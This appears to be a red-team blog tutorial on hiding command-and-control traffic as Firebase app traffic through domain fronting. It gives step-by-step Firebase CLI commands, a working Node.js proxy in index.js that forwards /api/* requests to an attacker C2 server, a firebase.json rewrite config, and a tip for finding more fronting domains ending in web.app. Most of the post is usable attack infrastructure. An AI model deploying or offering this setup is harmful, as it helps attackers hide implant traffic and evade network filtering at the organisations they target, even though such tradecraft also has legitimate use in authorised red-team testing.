Firebase Domain Front - Hiding C2 as App traffic
We often see that large organization use firebase for hosting their applications and database. Firebase has a lot of features such as real-time database, hosting, cloud functions, hosting etc. Today we are going to talk about firebase hosting and cloud functions which are used by a lot of mobile applications these days. In our recent project, we were able to hide ourselves as a legit mobile traffic and bypass a lot of traffic filters

Firebase Cloud Functions
Firebase allows an operator to write an applications in Node JS and deploy it using its hosting feature.
So lets start by selecting a app hosted using firebase. In the following case we'll take https://go.auk.eco/ as our selected app.

Go to Console in Top Right Corner

Create Firebase Project

Set up a project name

Create a Project
npm install -g firebase-tools
mkdir awesomedomainfront
cd awesomedomainfront
firebase login
firebase init hosting
Once you hit the above command you'll be presented with many options. See the following screenshot for responses to the options

Firebase Hosting Init
firebase init functions
Again you'll be presented with many options. See the following screenshot for the response to the options

Firebase Functions init
cd functions
npm i express --save
npm i http-proxy --save

Install Express and http-proxy
Since you are already in the functions folder after saving the npm packages. Lets edit the index.js file in this folder.
index.js
const functions = require('firebase-functions');
const express = require('express');
const app = express();
var http = require('http'), httpProxy = require('http-proxy');
var proxy = httpProxy.createProxyServer({secure:false,xfwd:true}); //Setting up X-forwarded for header
// your C2 must have a URI . In this case I am using /api/"
app.all('/api/*', function(req, res, next){
console.log(req.url);
req.url = "/api/" + req.url.slice(5);
console.log("Req URL:"+req.url);
proxy.web(req, res, {
target: 'https://firebase.redteam.cafe:443/' /* Change it to your domain */
}, function(e) {
console.log(e);
});
res.set('Cache-Control', 'no-cache, no-store');
});
exports.app = functions.https.onRequest(app);
// // Create and Deploy Your First Cloud Functions
// // https://firebase.google.com/docs/functions/write-firebase-functions
//
// exports.helloWorld = functions.https.onRequest((request, response) => {
// functions.logger.info("Hello logs!", {structuredData: true});
// response.send("Hello from Firebase!");
// });
Go to the parent folder and edit firebase.json
cd ../
firebase.json
{
"hosting": {
"headers" : [{
"source" : "**/*[email protected](js)",
"headers": [{
"key" : "Cache-Control",
"value" : "no-cache, no-store"
}]
}],
"public": "public",
"rewrites": [{
/* your C2 must have a URI . In this case I am using /api/" */
"source": "/api/**",
"function": "app",
"run":{
"region" : "asia-east2"
}
}],
"ignore": [
"firebase.json",
"**/.*",
"**/node_modules/**"
]
},
"functions": {
}
}
Lets start the deployment of our firebase project
firebase deploy

Error Message for deploying the project
Modify the plan of project from free plan to Pay as you go plan

Click Modify Plan

Select "Pay as you go" plan
Now lets try the deployment again.
firebase deploy

Deploy Complete
Lets check what's hosted on https://firebase.redteam.cafe/api/index.html

Response from firebase.redteam.cafe
Let's check if our app works fine

Response from amazingdomainfront.web.app

Domain front with Test Domain is Successful
Hint: Try to find domains whose CNAME ends with *.web.app
UPDATE (4/5/2021) : Vincent Yiu created a list for domain fronts in the following github repo
Source code can be downloaded from my github repository https://github.com/shantanu561993/Awesome_Firebase_DomainFront
Last modified 2yr ago